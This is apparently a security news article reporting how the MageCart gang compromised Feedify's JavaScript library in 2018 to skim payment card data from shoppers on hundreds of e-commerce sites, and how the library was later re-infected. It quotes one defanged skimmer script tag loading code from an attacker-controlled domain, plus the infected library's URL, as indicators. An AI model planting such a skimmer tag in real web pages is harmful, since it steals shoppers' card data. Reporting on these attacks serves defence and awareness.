MageCart cyber gang compromised the cloud service firm Feedify and stole payment card data from customers of hundreds of e-commerce sites.

MageCart crime gang appears very active in this period, payment card data from customers of hundreds of e-commerce websites may have been stolen due to the compromise of the cloud service firm Feedify.

Cloud service firm Feedify has over 4,000 customers, it is a cloud platform to engage customers’ clients with powerful tools that target them based on their behavior.

Feedify leverages a JavaScript script that their customers add to their websites to use the service. MageCart hackers compromised the supply chain for the Feedify service. The script loads various resources from Feedify’s infrastructure, including a library named “feedbackembad-min-1.0.js,” which was compromised by MageCart.

Every time user visits a page of the e-commerce site of a Feedify customer will load the malicious script that allowed the crooks to siphon personal information and payment card data.

They've been affected by Magecart since Friday, August 17 2018 @ 16:51:01 GMT as we recorded it. https://t.co/VjD5Qc3Be0 — Yonathan Klijnsma (@ydklijnsma) September 11, 2018

The group has been active since at least 2015 and compromised many e-commerce websites to steal payment card and other sensitive data.

The group injects a skimmer script in the target websites to siphon payment card data, once the attackers succeed in compromising a site, it will add an embedded piece of Javascript to the HTML template. Below an example script dubbed MagentoCore.

<script type= "text/javascript" src= "hxxps://magentocore.net/mage/mage.js" ></script>

This script records keystrokes from customers and sends them to a server controlled by the attacker.

Typically hackers attempt to compromise third-party features that could allow them to access a large number of websites.

According to the security firm RiskIQ, the MageCart group carried out a targeted attack against the British Airways and used a customized version of the script to remain under the radar.

Using the same tactic, the MageCart compromised the website using the Feedify service by injecting their malicious code into a library the Feedify script served to customers’ websites.

According to the experts from RiskIQ, MageCart hackers might have had access to the Feedify servers for nearly a month.

Once notified Feedify the compromise, the company removed the malicious script:

Magecart on Feedify. A customer engagement tool. According to there website 4000+ website use there tooling/code. Fixed today after I notified them.@ydklijnsma @GossiTheDog pic.twitter.com/K2czXkUoHD — Placebo (@Placebo52510486) September 11, 2018

but apparently, the hackers re-infected the library.

FYI: Feedify is re-infected with Magecart since about an hour ago, exact time of infection is: Wed, 12 Sep 2018 14:16:02 GMT. URL: hxxps://cdn[.]feedify[.]net/getjs/feedbackembad-min-1.0.js /cc @Placebo52510486 @GossiTheDog @_feedify https://t.co/4DtpP3l0Wd — Yonathan Klijnsma (@ydklijnsma) September 12, 2018

The events demonstrate the ability of the MageCart crime gang in compromising the infrastructure of its victims.

In August, security expert Willem de Groot discovered that the MagentoCore skimmer at the time already infected 7,339 Magento stores.

At the time, querying the PublicWWW service it was possible to verify that the MagentoCore script was deployed on 5,214 domains, actually the number of compromised website id still high (4762) despite the awareness campaign.

Pierluigi Paganini

(Security Affairs – cybercrime, MageCart)

Share this...

Linkedin Reddit Pinterest

Share On